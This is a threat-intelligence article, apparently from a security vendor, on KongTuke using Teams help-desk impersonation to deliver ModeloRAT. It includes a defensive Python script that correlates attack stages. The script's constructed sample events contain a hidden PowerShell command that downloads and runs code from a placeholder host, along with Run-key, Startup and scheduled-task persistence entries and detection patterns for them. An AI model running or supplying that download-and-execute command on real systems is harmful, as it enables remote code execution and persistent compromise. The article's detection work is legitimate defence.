KongTuke, a financially motivated initial access broker, is now using external Microsoft Teams chats to impersonate help-desk staff and push ModeloRAT onto Windows machines. ReliaQuest reported the campaign on May 14, 2026, describing it as the first time the group has been seen using a collaboration platform instead of relying only on web-based ClickFix-style delivery [1].
The shift matters because Teams chat changes the user’s threat model. A fake support message does not arrive like a suspicious email; it appears inside the same work interface employees use every day. Microsoft Teams external access is designed to let users communicate with people outside their organization, but broad federation also gives attackers a direct line to employees unless it is restricted or monitored [2].
Why This Is More Than Another ClickFix Variant
ReliaQuest says the chain can move from first chat contact to persistent access in under five minutes. The attacker uses a support-themed pretext, directs the victim to run a diagnostic-style command, and drops a portable WinPython environment into a WPy64-* directory under the user’s roaming AppData folder (%APPDATA%\WPy64-*). That runtime then carries ModeloRAT modules, host reconnaissance, multiple command-and-control paths, and layered persistence.
The useful detection point is not a single sender domain. KongTuke reportedly rotated through multiple Microsoft 365 tenants, which means static blocking will age badly. Defenders should correlate the sequence: external Teams contact, hidden PowerShell from Windows Run, a new WPy64-* directory in AppData, pythonw.exe activity, Startup folder changes, Run key entries, and suspicious scheduled tasks. One weak signal may be noise; the sequence is the incident.
This also changes response. Removing one payload, blocking one C2 address, or deleting one Run key is not enough if the host has several persistence triggers. Before returning a machine to production, enumerate Startup items, Run keys, scheduled tasks, portable Python folders, recent cloud-download artifacts, and outbound connections from pythonw.exe. If a user was contacted over Teams, review external chat events and whether the sender tenant should have been allowed to reach users at all.
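The two paragraphs above describe a detection rule (correlate the sequence, not a single signal) and a response check (enumerate every persistence trigger before returning the host). The script below is an added example written for this article, not code from ReliaQuest, Gridinsoft or the campaign itself. It assumes a simplified, Sysmon-like event schema of its own, constructed sample events, that a command typed into Windows Run starts PowerShell with explorer.exe as its parent, and an illustrative WPy64-31180 directory name; stage names are the author's labels. It scores a host as noise, suspicious or incident, and lists every persistence artifact that points at the portable Python runtime.

```python
"""Correlate the Teams-contact -> hidden PowerShell -> WPy64 -> persistence chain.

Added example, not code from ReliaQuest, Gridinsoft or the campaign. Assumptions:
the event dicts use my own Sysmon-like schema, the sample events are constructed,
"Windows Run" launches PowerShell with explorer.exe as parent, WPy64-31180 is an
illustrative directory name, and .lnk shortcut targets are already resolved.
"""
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # the report puts chat-to-persistence at under five minutes

WPY_DIR = re.compile(r"AppData\\Roaming\\WPy64-[^\\]+", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
HIDDEN_PS = re.compile(r"powershell(\.exe)?.*-w(indowstyle)?\s+h(idden)?", re.IGNORECASE)

# Without all three of these the chain has not fired, whatever else is noisy on the host.
REQUIRED = {"teams_external_contact", "hidden_powershell_from_run", "wpy64_runtime_dropped"}


def classify(ev):
    """Map one event to a chain stage (my labels), or None if it is not part of the chain."""
    t = ev["type"]
    if t == "teams_message" and ev.get("external"):
        return "teams_external_contact"
    if t == "process_create":
        image = ev.get("image", "")
        parent = ev.get("parent_image", "").lower()
        if HIDDEN_PS.search(ev.get("command_line", "")) and parent.endswith("explorer.exe"):
            return "hidden_powershell_from_run"  # assumption: Win+R launches via explorer.exe
        if image.lower().endswith("pythonw.exe") and WPY_DIR.search(image):
            return "pythonw_from_wpy64"
    if t == "file_create":
        if WPY_DIR.search(ev["path"]):
            return "wpy64_runtime_dropped"
        if STARTUP_DIR.search(ev["path"]):
            return "persistence_startup_folder"
    if t == "registry_set" and RUN_KEY.search(ev["key"]):
        return "persistence_run_key"
    if t == "scheduled_task_create":
        return "persistence_scheduled_task"
    if t == "network_connect" and ev.get("image", "").lower().endswith("pythonw.exe"):
        return "pythonw_outbound"
    return None


def correlate(events, host):
    """Stages seen on `host` within WINDOW after its first external Teams contact."""
    evs = sorted((e for e in events if e["host"] == host), key=lambda e: datetime.fromisoformat(e["ts"]))
    contact = next((e for e in evs if classify(e) == "teams_external_contact"), None)
    if contact is None:
        return set()
    t0 = datetime.fromisoformat(contact["ts"])
    return {classify(e) for e in evs
            if t0 <= datetime.fromisoformat(e["ts"]) <= t0 + WINDOW and classify(e)}


def verdict(stages):
    """One weak signal is noise; contact + hidden PowerShell + dropped runtime + persistence is the incident."""
    if REQUIRED <= stages and any(s.startswith("persistence_") for s in stages):
        return "incident"
    return "suspicious" if len(stages) >= 2 else "noise"


def persistence_inventory(events, host):
    """Every persistence artifact on `host` that points at the portable runtime; all of them must go."""
    found = []
    for e in (e for e in events if e["host"] == host):
        stage = classify(e)
        if stage and stage.startswith("persistence_"):
            target = e.get("target") or e.get("value") or e.get("action") or e.get("path", "")
            if WPY_DIR.search(target) or "pythonw.exe" in target.lower():
                found.append((stage, target))
    return found


PY = r"C:\Users\jdoe\AppData\Roaming\WPy64-31180\python\pythonw.exe"
SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"ts": "2026-05-12T09:00:00", "host": "WS-042", "type": "teams_message", "external": True, "user": "jdoe"},
    {"ts": "2026-05-12T09:01:10", "host": "WS-042", "type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iwr https://example.invalid/d | iex"'},
    {"ts": "2026-05-12T09:01:40", "host": "WS-042", "type": "file_create", "path": PY},
    {"ts": "2026-05-12T09:02:05", "host": "WS-042", "type": "process_create", "image": PY,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "pythonw.exe loader.py"},
    {"ts": "2026-05-12T09:02:30", "host": "WS-042", "type": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "value": PY + " loader.py"},
    {"ts": "2026-05-12T09:02:31", "host": "WS-042", "type": "file_create", "target": PY,
     "path": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk"},
    {"ts": "2026-05-12T09:02:35", "host": "WS-042", "type": "scheduled_task_create", "name": "SystemUpdater", "action": PY + " loader.py"},
    {"ts": "2026-05-12T09:03:00", "host": "WS-042", "type": "network_connect", "image": PY, "dest": "203.0.113.10:443"},
    {"ts": "2026-05-12T09:05:00", "host": "WS-077", "type": "teams_message", "external": True, "user": "asmith"},
]

if __name__ == "__main__":
    for host in ("WS-042", "WS-077"):
        stages = correlate(SAMPLE_EVENTS, host)
        print(host, verdict(stages), sorted(stages))
        for stage, target in persistence_inventory(SAMPLE_EVENTS, host):
            print("  remove:", stage, "->", target)
```

WS-077 receives an external Teams message and nothing else, so it scores as noise rather than an alert; WS-042 shows the full sequence and three separate persistence triggers, which is why deleting the Run key alone would leave the Startup shortcut and the scheduled task live. Feeding real Sysmon or EDR telemetry would mean mapping its field names onto this schema, and the regexes deliberately match on the WPy64-* directory and pythonw.exe rather than on any sender tenant, since the report says those tenants rotate.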
Gridinsoft has tracked related patterns before, including ClickFix WordPress attacks pushing Vidar Stealer and Teams phishing used in MuddyWater’s Chaos ransomware masquerade. KongTuke sits between those two patterns: it keeps the paste-and-run user manipulation of ClickFix, but moves the trust hook into collaboration chat where many organizations have weaker guardrails than email.
Microsoft-themed lures are also shifting toward session abuse: device code phishing shows how a legitimate login page can be used to authorize an attacker-controlled session.